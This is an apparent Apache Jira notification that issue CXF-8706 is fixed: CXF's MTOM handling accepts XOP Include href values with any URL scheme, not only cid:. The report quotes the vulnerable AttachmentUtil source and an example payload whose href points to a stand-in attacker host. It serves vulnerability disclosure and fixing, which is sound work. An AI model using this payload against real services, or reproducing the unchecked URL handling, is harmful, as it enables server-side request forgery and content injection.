[
https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Andriy Redko resolved CXF-8706.
-------------------------------
Resolution: Fixed
> CXF MTOM handler allow content injection
> ----------------------------------------
>
> Key: CXF-8706
> URL: https://issues.apache.org/jira/browse/CXF-8706
> Project: CXF
> Issue Type: Bug
> Components: JAXB Databinding
> Affects Versions: 3.5.2
> Reporter: Chunqing Lin
> Assignee: Andriy Redko
> Priority: Major
> Fix For: 4.0.0, 3.6.0, 3.5.5, 3.4.10
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled,
> Unmarshaller allows XOP Include tag to have href attributes that allow any
> protocols. According to the W3C MTOM spec, only "cid:" should be allowed for
> href scheme.
> The affected call stack is:
> AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>)
> line: 554
> JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
> MTOMDecorator.startElement(TagName) line: 70
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId,
> Collection<Attachment> atts) {
> // Is this right? - DD
> if (contentId.startsWith("cid:")) {
> try {
> contentId = URLDecoder.decode(contentId.substring(4),
> StandardCharsets.UTF_8.name());
> } catch (UnsupportedEncodingException ue) {
> contentId = contentId.substring(4);
> }
> return loadDataSource(contentId, atts);
> } else if (contentId.indexOf("://") == -1) {
> return loadDataSource(contentId, atts);
> } else {// should only take cid for XOP
> try {
> return new URLDataSource(new URL(contentId));
> } catch (MalformedURLException e) {
> throw new Fault(e);
> }
> }
> }
>
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload";
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
